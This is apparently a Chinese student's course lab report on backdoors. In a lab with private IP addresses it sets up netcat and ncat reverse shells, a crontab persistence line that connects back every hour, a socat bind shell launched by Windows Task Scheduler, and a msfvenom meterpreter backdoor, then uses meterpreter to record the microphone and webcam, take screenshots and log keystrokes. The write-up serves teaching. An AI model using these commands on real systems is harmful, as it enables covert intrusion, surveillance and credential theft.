20145237 Exp2 後門原理與實踐

20145237《網路對抗》exp2 後門原理與實踐

在windows下，先使用ipconfig指令檢視本機ip：

輸入ncat.exe -l -p 5237使用ncat.exe程式監聽本機的5237埠：

在kali環境下，使用nc指令的-e選項反向連線windows主機的5237埠：

windows下成功獲得了乙個kali的shell，執行ls指令如下：

過程與之前的類似，在kali環境下用ifconfig檢視ip：

使用nc -l -p 5237指令監聽5237埠：

在windows下，輸入ncat.exe -e cmd.exe 192.168.35.128 5237使用ncat.exe程式的-e選項項反向連線kali主機的5237埠：

kali下可以看到windows的命令提示，可以輸入windows命令：

實驗內容

先在windows系統下，用````ncat.exe -l -p 5237```，監聽5237埠

用crontab -e指令編輯一條定時任務(輸入3，選vim.basic)

在最後一行新增30 * * * * /bin/netcat 192.168.1.200 5237 -e /bin/sh，意思是在每個小時的第30分鐘反向連線windows主機的5237埠(設定成30的原因是我當時的時間是28分)：

使用socat獲取主機操作shell, 任務計畫啟動

實踐過程

在windows系統下，開啟控制面板->管理工具->任務計畫程式，建立任務，填寫任務名稱後，新建乙個觸發器：

在操作->程式或指令碼中選擇你socat.exe檔案的路徑，在新增引數一欄填寫tcp-listen:5237 exec:cmd.exe,pty,stderr，這個命令的作用是把cmd.exe繫結到埠5237，同時把cmd.exe的stderr重定向到stdout上：

建立完成之後，按windows+l快捷鍵鎖定計算機，再次開啟時，可以發現之前建立的任務已經開始執行：

此時，在kali環境下輸入指令socat - tcp:192.168.1.200:5237，這裡的第乙個引數-代表標準的輸入輸出，第二個流連接到windows主機的5237埠，此時可以發現已經成功獲得了乙個cmd shell：

輸入指令msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.86.129 lport=5237 -f exe > 20145237_backdoor.exe生成後門程式：

通過nc指令將生成的後門程式傳送到windows主機上：

windows：ncat.exe -l 5237 > 20145237.exe

kali：nc 192.168.1.100 5237 < 20145237.exe

在kali上使用msfconsole指令進入msf控制台，set payload windows/meterpreter/reverse_tcp，使用監聽模組，設定payload，設定**回連的ip和埠

設定完成後，執行監聽：

開啟windows上的後門程式：

此時kali上已經獲得了windows主機的連線，並且得到了遠端控制的shell：

使用record_mic指令可以截獲一段音訊：

使用webcam_snap指令可以使用攝像頭進行拍照：

使用webcam stream指令可以使用攝像頭進行錄影：

使用screenshot指令可以進行截圖：

使用keyscan_start指令開始記錄下擊鍵的過程，使用keyscan_dump指令讀取擊鍵的記錄：